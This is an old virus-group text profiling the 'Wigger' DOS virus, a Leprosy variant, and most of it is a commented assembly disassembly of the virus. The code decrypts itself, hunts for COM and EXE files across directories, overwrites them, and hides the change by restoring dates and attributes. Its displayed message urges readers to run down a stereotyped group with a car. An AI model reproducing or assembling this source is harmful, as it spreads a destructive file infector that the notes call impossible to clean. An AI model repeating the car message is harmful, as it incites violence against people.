ÛÛÛÛÛÛÛ Û Û ÛÛÛÛÛÛÛÛÛ Û ÛÛÛÛÛÛÛÛ Û Û Û Û Û ÛÛÛ ÛÛ Û Û Û Û Û Û ÛÛ ÛÛÛÛÛÛÛÛÛÛÛ Û Û Û Û Û Û Û Û Û Û Û Û Û Û Û Û Û Û ÛÛÛÛÛÛ ÛÛÛÛÛÛÛÛÛ Û ÛÛÛ ÛÛÛ ÛÛÛÛ ÛÛÛÛÛÛÛ ÛÛÛÛ ÛÛÛÛÛÛÛÛ Û Û Û ÛÛÛÛÛÛÛ Û ÛÛÛ Û Û Û Û Û Û ÛÛ Û ÛÛ Û Û Û Û Û Û Û ÛÛÛÛ Û Û ÛÛ Û Û Û Û ÛÛÛÛÛ Û Û ÛÛÛÛÛÛÛÛ Û ÛÛ ÛÛÛÛÛÛÛÛ ÛÛ Û Û Û Û Û Û Û Û Û ÛÛÛÛÛÛÛ Û Û ÛÛÛÛÛÛÛÛ Û Û ÛÛ ÛÛÛÛÛÛÛ Distributed By Amateur Virus Creation & Research Group (AVCR) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Research of the wigger virus by Security Threat Name: Wigger ----------------------------------------------------------------------------- Alias: ----------------------------------------------------------------------------- Type Of Code: Not Informed ----------------------------------------------------------------------------- VSUM Information: No info found on WIGGER.COM ----------------------------------------------------------------------------- Antivirus Detection: (1) ThunderByte Anti Virus (TBAV) reported wigger.com as leprosy (2) Frisk Software's F-Protect (F-PROT) reported wigger.com as leprosy.b (3) McAfee Softwares Anti Virus (SCAN.EXE) reported wigger.com as leprosy.b (4) MicroSoft Anti Virus (MSAV.EXE) reported wigger.com as "the leprosy virus" ----------------------------------------------------------------------------- Execution Results: Infects all COM and EXE files. ----------------------------------------------------------------------------- Cleaning Recommendations: Impossible. Infected programs must be deleted ----------------------------------------------------------------------------- Researcher's Notes: As infecting either reads "program to big to fit in memory" or "You have noticed wiggers seem to have taken over the high school scene." "If you see one, please hit him with your car". It is a variant of leprosy. Also "News flash","Plague","viper","busted","leprosy-c", "leprosy-d", "scribble","seneca","surfer","xarbras",and "angel of death" ----------------------------------------------------------------------------- Disassembly of the wigger Virus PAGE 60,132 ;ÄÄÄÄÄÄÄÄÄÄ CODE_SEG_1 ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ CODE_SEG_1 segment para public assume CS:CODE_SEG_1, DS:CODE_SEG_1, SS:CODE_SEG_1, ES:CODE_SEG_1 org 100h ;ħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħ ;ħ ;ħ ENTRY POINT ;ħ ;ħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħ ;ħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħ ;ħ ;ħ PROCEDURE proc_start ;ħ ;ħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħ proc_start proc far start: ; N-Ref=0 call near ptr proc_2 jmp loc_5 proc_start endp var1_106 db 0 ;ħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħ ;ħ ;ħ PROCEDURE proc_1 ;ħ ;ħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħ proc_1 proc near mov BX,Word Ptr var1_2a3 ; [6556:02A3] = 0 push BX call near ptr proc_2 pop BX mov CX,29Ah mov DX,offset var1_100 mov AH,40h ; '@' int 21h ; DOS func ( ah ) = 40h ; Write to file or device ;BX-file handle ; CX-bytes to read DS:DX-DTA ;if CF=0 AX-bytes read ; else AX-ret code call near ptr proc_2 retn proc_1 endp ;ħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħ ;ħ ;ħ PROCEDURE proc_2 ;ħ ;ħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħ proc_2 proc near mov BX,offset var1_131 loc_1: ; N-Ref=1 mov AH,Byte Ptr [BX] xor AH,Byte Ptr var1_106 ; [6556:0106] = 8B00h mov Byte Ptr [BX],AH inc BX cmp BX,3CBh jle loc_1 ; Jump if not greater ( <= ) retn proc_2 endp var1_131 db '*.EXE' db 0 var1_137 db '*.COM' db 0 var1_13d db 2Eh, 2Eh, 0 var1_140 db 0Dh, 0Ah db 'Program too big to fit in memory$' var1_163 db 0Dh, 0Ah, 9, 0C9h db 66 dup (0CDh) db 0BBh, 20h, 24h var1_1ac db 0Dh, 0Ah, 9, 0BAh db 20h, 20h, 57h var1_1b3 db 'e Have Noticed That Wiggers Seem To Have' loc_2: ; N-Ref=0 and Byte Ptr [SI+61h],DL var1_1de db 'ken Over The High ' db 0BAh, 20h, 24h var1_1f5 db 0Dh, 0Ah, 9, 0BAh var1_1f9 db ' School Scen' var1_207 db 'e. If You See One, Please Hit Him With Your Car! ' db ' ' db 0BAh, 20h, 24h var1_23e db 0Dh, 0Ah loc_3: ; N-Ref=0 or AX,CX int 0CDh int 0CDh int 0CDh int 0CDh int 0CDh int 0CDh int 0CDh int 0CDh int 0CDh int 0CDh int 0CDh int 0CDh int 0CDh int 0CDh int 0CDh int 0CDh int 0CDh int 0CDh int 0CDh int 0CDh int 0CDh int 0CDh int 0CDh int 0CDh int 0CDh int 0CDh int 0CDh int 0CDh int 0CDh int 0CDh int 0CDh int 0CDh int 0CDh mov SP,2420h add Byte Ptr [BX+SI],AL add Byte Ptr [BX+SI],AL add Byte Ptr [BX+SI],AL add Byte Ptr [BX+SI],AL add Byte Ptr [BX+SI],AL add Byte Ptr [BX+SI],AL add Byte Ptr [BX+SI],AL add Byte Ptr [BX+SI],AL add Byte Ptr [BX+SI],AL add Byte Ptr [BX+SI],AL add Byte Ptr [BX+SI],AL add Byte Ptr [BX+SI],AL add Byte Ptr [BX+SI],AL add Byte Ptr [BX+SI],AL add Byte Ptr [BX+SI],AL loc_5: ; N-Ref=4 mov AH,2Ch ; ',' int 21h ; DOS func ( ah ) = 2Ch ; Get time ;CL-min CH-hours DH-seconds ; DL-1/100 of secs cmp Byte Ptr var1_106,0 ; [6556:0106] = 8B00h je loc_6 ; Jump if equal ( = ) cmp DH,0Fh jnle loc_7 ; Jump if greater ( > ) loc_6: ; N-Ref=1 cmp DL,0 je loc_5 ; Jump if equal ( = ) mov Byte Ptr var1_106,DL ; [6556:0106] = 8B00h loc_7: ; N-Ref=1 mov Byte Ptr var1_29b,0 ; [6556:029B] = 0 mov Byte Ptr var1_29c,4 ; [6556:029C] = 0 mov Byte Ptr var1_2a5,0 ; [6556:02A5] = 0B400h loc_8: ; N-Ref=1 mov CX,27h mov DX,offset var1_131 mov AH,4Eh ; 'N' int 21h ; DOS func ( ah ) = 4Eh ; FIND FIRST: Start file search ;CX-attr to search on ; DS:DX-ASCIIZ string ;if CF=1 AX-ret code cmp AX,12h je loc_9 ; Jump if equal ( = ) call near ptr proc_3 loc_9: ; N-Ref=1 mov CX,27h mov DX,offset var1_137 mov AH,4Eh ; 'N' int 21h ; DOS func ( ah ) = 4Eh ; FIND FIRST: Start file search ;CX-attr to search on ; DS:DX-ASCIIZ string ;if CF=1 AX-ret code cmp AX,12h je loc_10 ; Jump if equal ( = ) call near ptr proc_3 loc_10: ; N-Ref=1 mov DX,offset var1_13d mov AH,3Bh ; ';' int 21h ; DOS func ( ah ) = 3Bh ; CHDIR: Change directory ;DS:DX-ASCIIZ string ;AX-ret code if CF set dec Byte Ptr var1_29c ; [6556:029C] = 0 jne loc_8 ; Jump if not equal ( != ) jmp loc_15 ;ħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħ ;ħ ;ħ PROCEDURE proc_3 ;ħ ;ħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħ proc_3 proc near loc_11: ; N-Ref=1 mov BX,80h mov AX,Word Ptr [BX+15h] mov Word Ptr var1_2a1,AX ; [6556:02A1] = 0 mov AX,Word Ptr [BX+16h] mov Word Ptr var1_29d,AX ; [6556:029D] = 0 mov AX,Word Ptr [BX+18h] mov Word Ptr var1_29f,AX ; [6556:029F] = 0 mov DX,9Eh mov CX,0 mov AL,1 mov AH,43h ; 'C' int 21h ; DOS func ( ah ) = 43h ; CHMOD:Get/set file attributes ;AL-(0/1)get/set code CX-attrib ; DS:DX-ASCIIZ string ;if CF=1 AX-ret code ; CX-attrib if set used mov AL,2 mov AH,3Dh ; '=' int 21h ; DOS func ( ah ) = 3Dh ; Open file ;CX-acsess code ; DS:DX-ASCIIZ string ;AX-file handle ; if CF=1 AX-error code mov Word Ptr var1_2a3,AX ; [6556:02A3] = 0 mov BX,AX mov CX,14h mov DX,offset var1_287 mov AH,3Fh ; '?' int 21h ; DOS func ( ah ) = 3Fh ; Read from file or device ;BX-file handle ; CX-bytes to read DS:DX-DTA ;if CF=0 AX-bytes read ; else AX-ret code mov BX,offset var1_287 mov AH,Byte Ptr var1_106 ; [6556:0106] = 8B00h mov Byte Ptr [BX+6],AH mov SI,offset var1_100 mov DI,offset var1_287 mov AX,DS mov ES,AX cld ; Clear direction flag repz cmpsb ; Repeat if ZF = 1, CX > 0 ; Cmp byte at DS:SI to ES:DI jne loc_14 ; Jump if not equal ( != ) call near ptr proc_4 inc Byte Ptr var1_29b ; [6556:029B] = 0 loc_12: ; N-Ref=1 mov AH,4Fh ; 'O' int 21h ; DOS func ( ah ) = 4Fh ; FIND NEXT: Continue file search ;DS:DX-info from FIND FIRST ; or prev FIND NEXT ;if CF=1 AX-ret code cmp AX,12h je loc_13 ; Jump if equal ( = ) jmp short loc_11 loc_13: ; N-Ref=1 retn loc_14: ; N-Ref=1 mov BX,Word Ptr var1_2a3 ; [6556:02A3] = 0 mov AH,3Eh ; '>' int 21h ; DOS func ( ah ) = 3Eh ; Close file handle ;BX-file handle ;if CF=1 AX-ret code mov AH,3Dh ; '=' mov DX,9Eh mov AL,2 int 21h ; DOS func ( ah ) = 3Dh ; Open file ;CX-acsess code ; DS:DX-ASCIIZ string ;AX-file handle ; if CF=1 AX-error code mov Word Ptr var1_2a3,AX ; [6556:02A3] = 0 call near ptr proc_1 call near ptr proc_4 inc Byte Ptr var1_2a5 ; [6556:02A5] = 0B400h dec Byte Ptr var1_29c ; [6556:029C] = 0 je loc_15 ; Jump if equal ( = ) jmp short loc_12 proc_3 endp db 0C3h ;ħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħ ;ħ ;ħ PROCEDURE proc_4 ;ħ ;ħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħħ proc_4 proc near mov BX,Word Ptr var1_2a3 ; [6556:02A3] = 0 mov CX,Word Ptr var1_29d ; [6556:029D] = 0 mov DX,Word Ptr var1_29f ; [6556:029F] = 0 mov AL,1 mov AH,57h ; 'W' int 21h ; DOS func ( ah ) = 57h ; Get/set file date and time ;AL-(0/1)get/set flag BX-handle ; CX/DX-time/date,if AL=1 ;if CF=1 AX-extended err code ; CX/DX-time/date if AL=0 mov BX,Word Ptr var1_2a3 ; [6556:02A3] = 0 mov AH,3Eh ; '>' int 21h ; DOS func ( ah ) = 3Eh ; Close file handle ;BX-file handle ;if CF=1 AX-ret code mov CX,Word Ptr var1_2a1 ; [6556:02A1] = 0 mov AL,1 mov DX,9Eh mov AH,43h ; 'C' int 21h ; DOS func ( ah ) = 43h ; CHMOD:Get/set file attributes ;AL-(0/1)get/set code CX-attrib ; DS:DX-ASCIIZ string ;if CF=1 AX-ret code ; CX-attrib if set used retn proc_4 endp loc_15: ; N-Ref=2 cmp Byte Ptr var1_29b,6 ; [6556:029B] = 0 jl loc_16 ; Jump if less ( < ) cmp Byte Ptr var1_2a5,0 ; [6556:02A5] = 0B400h jnle loc_16 ; Jump if greater ( > ) mov AH,9 mov DX,offset var1_163 int 21h ; DOS func ( ah ) = 9 ; Display string ;DS:DX-output string mov DX,offset var1_1ac int 21h ; DOS func ( ah ) = 9 ; Display string ;DS:DX-output string mov DX,offset var1_1f5 int 21h ; DOS func ( ah ) = 9 ; Display string ;DS:DX-output string mov DX,offset var1_23e int 21h ; DOS func ( ah ) = 9 ; Display string ;DS:DX-output string jmp short loc_17 db 90h loc_16: ; N-Ref=2 mov AH,9 mov DX,offset var1_140 int 21h ; DOS func ( ah ) = 9 ; Display string ;DS:DX-output string loc_17: ; N-Ref=1 mov AH,4Ch ; 'L' int 21h ; DOS func ( ah ) = 4Ch ; Terminate process ;AL-ret code dw 7 dup (9090h) db 90h CODE_SEG_1 ends end start ----------------------------------------------------------------------------- This seems to be similar to the leprosy B code except for encryption and strings displayed. ST